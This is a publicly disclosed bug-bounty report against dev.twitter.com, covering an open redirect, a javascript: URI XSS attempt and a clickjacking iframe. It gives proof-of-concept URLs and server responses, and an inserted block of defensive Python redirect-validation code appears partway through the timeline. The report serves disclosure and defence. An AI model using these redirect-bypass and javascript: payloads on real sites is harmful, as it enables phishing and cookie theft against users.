[dev.twitter.com] XSS and Open Redirect Protection Bypass
State Resolved (Closed)
Disclosed publicly 2019-02-07T16:32:13.022Z
Reported To
Weakness none
Bounty $1,120


Timeline
submitted a report to Twitter.
2018-03-26T14:44:33.635Z

Description:
Hi,
after I finished reading the report https://hackerone.com/reports/260744, I started to test this subdomain. I found an interesting URL [https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/basics/adding-international-support-to-your-apps%5D. This URL is special; my intuition told me that it might have a problem. So I tested it, and amazingly, I found a way to bypass the protection.

PoC: Open Redirect
https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/

HTTP Response:
HTTP/1.1 302 Found
location: http://www.bywalks.com
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="http://www.bywalks.com">http://www.bywalks.com</a>. If not click the link.

PoC: XSS
https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/javascript:alert(1)/

HTTP Response:
HTTP/1.1 302 Found
location: javascript:alert(1)
...
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="javascript:alert(1)">javascript:alert(1)</a>. If not click the link.

PoC: ClickJacking
<iframe src="https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/" sandbox="allow-forms"></iframe>

Impact

Phishing, stealing cookies, etc.

Regards,
Frans

bywalks Activities::Comment
2018-03-26T14:50:13.145Z
In my XSS PoC the location is javascript:alert(1). This will continue to jump. I have not bypassed the problem right now; I will investigate it further.


bywalks Activities::Comment
2018-03-26T14:51:48.287Z
(image attachment)


bugtriage-michael Activities::BugNeedsMoreInfo
2018-03-27T00:21:46.706Z
Thank you for your report. We have confirmed the open redirect. We have a question about the XSS: When we navigate to https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/javascript:alert(1)/ , we see a browser error: {F278951} We believe that this error occurs because of the response header `location: javascript:alert(1)`. Per our [program rules](https://hackerone.com/twitter), "vulnerabilities only affecting users of outdated or unpatched browsers" are not eligible for this program. Does any major browser currently allow `Location` headers to use the `javascript:` URI scheme? Thank you for thinking of Twitter security.


bywalks Activities::BugNew
2018-03-27T14:48:07.265Z
Hi, maybe I can't bypass your XSS defense. Next I'll report my recent discovery to you. When I use this PoC https://dev.twitter.com//web%2f:2/:///%01javascript:alert(1)/ the HTTP response is:
HTTP/1.1 302 Found
location: //web%2f:1/://dev.twitter.com/%01javascript:alert(1)
....
You should be redirected automatically to target URL: <a href="%01javascript:alert(1)">javascript:alert(1)</a>
I can see the HTML code; this is a good start, but the JavaScript cannot execute. If I can bypass this protection I will tell you again. Otherwise, handle it as an open redirect.


bywalks Activities::Comment
2018-03-27T14:50:58.639Z
The true PoC is https://dev.twitter.com//web%2f:1/:///%01javascript:alert(1)/
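The two bypass shapes in this thread (the original report's appended-URL path, `/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/`, and the later `%01javascript:alert(1)` variant above) are both defeated by validating the redirect target the way a browser will interpret it, before it is placed in a `Location` header. The following is an added example written for this page, not Twitter's code or fix; it assumes a hypothetical server that only redirects to `https://dev.twitter.com` and uses the report's own PoC URLs as test input.

```python
"""Redirect-target validation that mirrors browser URL parsing (added example).

Assumptions (not from the report): the server only ever redirects within
ALLOWED_HOSTS over https, and every candidate target arrives as a string
before it is written to a Location header.
"""
from urllib.parse import unquote, urlsplit

ALLOWED_HOSTS = {"dev.twitter.com"}  # hypothetical allowlist

# Browsers strip leading/trailing C0 control characters and spaces, and drop
# tabs/newlines anywhere, before parsing. %01javascript: therefore becomes
# javascript: in the browser; a validator must see the same thing.
C0_AND_SPACE = "".join(chr(c) for c in range(0x21))


def is_safe_redirect(raw: str, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Return True only for same-host https targets or plain relative paths."""
    target = unquote(raw)  # decode %01, %2f, ... the way the browser will
    cleaned = target.replace("\t", "").replace("\n", "").replace("\r", "")
    cleaned = cleaned.strip(C0_AND_SPACE)

    # Any control character still inside the string is a parser-confusion attempt.
    if any(ord(ch) < 0x20 for ch in cleaned):
        return False
    # Backslash is treated as a slash by browsers for http(s), so "/\evil" == "//evil".
    if "\\" in cleaned:
        return False

    try:
        parts = urlsplit(cleaned)
    except ValueError:  # e.g. malformed IPv6 literal
        return False

    if parts.scheme:
        # Rejects javascript:, data:, http: and anything else that is not https.
        if parts.scheme.lower() != "https":
            return False
        if parts.hostname not in allowed_hosts:  # hostname drops port and userinfo
            return False
    elif parts.netloc:
        # Protocol-relative target: //host/path
        if parts.hostname not in allowed_hosts:
            return False

    # A second absolute URL glued onto the path, as in the report's first PoC,
    # shows up as "://" inside the path component; a path starting with "//"
    # would be read as protocol-relative by the browser.
    if "://" in parts.path or parts.path.startswith("//"):
        return False
    return True


def classify(candidates):
    """Map each candidate target to its verdict; handy for a quick audit."""
    return {c: is_safe_redirect(c) for c in candidates}


if __name__ == "__main__":
    # PoC values are taken from the report itself; the last two are constructed safe cases.
    samples = [
        "https://dev.twitter.com/web/sign-inhttps://dev.twitter.com/http://www.bywalks.com/",
        "javascript:alert(1)",
        "%01javascript:alert(1)",
        "//web%2f:1/://dev.twitter.com/%01javascript:alert(1)",
        "/basics/adding-international-support-to-your-apps",
        "https://dev.twitter.com/web/sign-in",
    ]
    for url, ok in classify(samples).items():
        print("ALLOW " if ok else "REJECT", url)
```

The check deliberately normalises control characters and percent-encoding itself rather than relying on `urlsplit` to do so, because older Python versions parse `\x01javascript:` as a relative path while the browser parses it as a `javascript:` URL; the validator and the client must disagree on nothing.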


bugtriage-michael Activities::Comment
2018-03-28T18:42:27.200Z
Thanks for following up. We're looking into this, and we'll keep you updated when we have additional information. Thank you for thinking of Twitter security.


acamacho Activities::BugTriaged
2018-04-05T19:11:01.913Z
Thank you for your report. We believe it may be a valid security issue and will investigate it further. It could take some time to find and update the root cause for an issue, so we thank you for your patience. Thank you for helping keep Twitter secure!


bywalks Activities::Comment
2018-04-17T04:56:46.248Z
Any update?


Activities::BountyAwarded
2018-04-20T19:08:23.666Z
Thanks again. As mentioned we’ll keep you updated as we investigate further. As a reminder, please remember to keep the details of this report private until we have fully investigated and addressed the issue.


bywalks Activities::Comment
2018-04-21T00:58:22.870Z
Thanks!


andrewsorensen Activities::BugResolved
2018-06-06T20:20:42.343Z
We consider this issue to be fixed now. Can you please confirm? Thank you for helping keep Twitter secure!


bywalks Activities::Comment
2018-06-07T00:49:04.557Z
I think it has been fixed. I cannot bypass it.


bywalks Activities::AgreedOnGoingPublic
2018-12-30T14:19:51.328Z


mli Activities::AgreedOnGoingPublic
2019-02-07T16:32:12.951Z


mli Activities::ReportBecamePublic
2019-02-07T16:32:13.050Z